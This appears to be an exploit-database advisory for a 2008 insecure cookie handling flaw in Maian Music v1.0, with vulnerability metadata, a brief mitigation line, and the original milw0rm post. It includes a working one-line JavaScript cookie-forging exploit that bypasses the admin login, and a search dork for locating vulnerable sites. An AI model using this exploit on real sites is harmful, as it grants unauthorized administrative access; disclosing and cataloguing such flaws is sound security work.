header-logo
Suggest Exploit
vendor:
Maian Music
by:
Saime
6.4
CVSS
MEDIUM
Insecure Cookie Handling
614
CWE
Product Name: Maian Music
Affected Version From: Maian Music v1.0
Affected Version To: Maian Music v1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:maian_script_world:maian_music:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Maian Music v1.0 Insecure Cookie Handling Vulnerability

Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie, equals admin username.(md5). The exploit is a javascript code that sets the cookie value to md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

Mitigation:

Ensure that the cookie value is properly validated and is not vulnerable to tampering.
Source

Exploit-DB raw data:

Author: Saime
Date: July 12, 2008
Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.

Description:
Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie,
equals admin username.(md5)

Exploit:
javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"

Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

# milw0rm.com [2008-07-12]